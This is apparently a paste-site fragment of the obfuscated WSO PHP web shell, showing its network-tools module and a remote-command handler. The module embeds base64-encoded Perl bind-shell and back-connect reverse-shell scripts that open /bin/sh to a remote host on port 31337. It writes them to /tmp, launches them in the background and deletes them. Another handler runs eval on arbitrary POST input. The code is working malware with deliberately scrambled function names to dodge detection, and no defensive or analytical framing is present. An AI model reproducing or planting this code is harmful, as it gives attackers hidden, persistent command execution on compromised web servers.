AcTIonNEtWoRk(){_();$_="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";$_="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo"<h1>Network tools</h1><div class=content>
- <form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">
- <span>Bind port to /bin/sh [perl]</span><br/>
- Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
- </form>
- <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">
- <span>Back-connect [perl]</span><br/>
- Server: <input type='text' name='server' value='".$_SERVER["REMOTE_ADDR"]."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
- </form><br>";if(isset($_POST["p1"])):function _($_,$_){$_=@FopEn($_,"w") or @fUncTiOn_ExIsTs("file_put_contents");if($_):@fWRITE($_,@Base64_DECOdE($_));@FcLoSE($_);endif;}if($_POST["p1"]=="bpp"):_("/tmp/bp.pl",$_);$_=_("perl /tmp/bp.pl ".$_POST["p2"]." 1>/dev/null 2>&1 &");sleep(01);echo"<pre class=ml1>".$_."
- "._("ps aux | grep bp.pl")."</pre>";unLInK("/tmp/bp.pl");endif;if($_POST["p1"]=="bcp"):_("/tmp/bc.pl",$_);$_=_("perl /tmp/bc.pl ".$_POST["p2"]." ".$_POST["p3"]." 1>/dev/null 2>&1 &");SLeeP(01);echo"<pre class=ml1>".$_."
- "._("ps aux | grep bc.pl")."</pre>";UNliNK("/tmp/bc.pl");endif;endif;echo"</div>";_();}function ACTiONrC(){if(!@$_POST["p1"]):$_=array("uname"=>Php_unamE(),"php_version"=>PHPVErsion(),"wso_version"=>WSO_VERSION,"safemode"=>@iNI_GET("safe_mode"));echo SERiaLIZE($_);else:eval($_POST["p1"]);endif;}if(empty($_POST["a"])):if(isset($_)&&FUnctIoN_ExiSTs("action".$_)):$_POST["a"]=$_;else:$_POST["a"]="SecInfo";endif;endif;if(!empty($_POST["a"])&&funcTIoN_eXisTS("action".$_POST["a"])):caLl_UsER_fUNC("action".$_POST["a"]);endif;exit;
Add Comment
Please, Sign In to add comment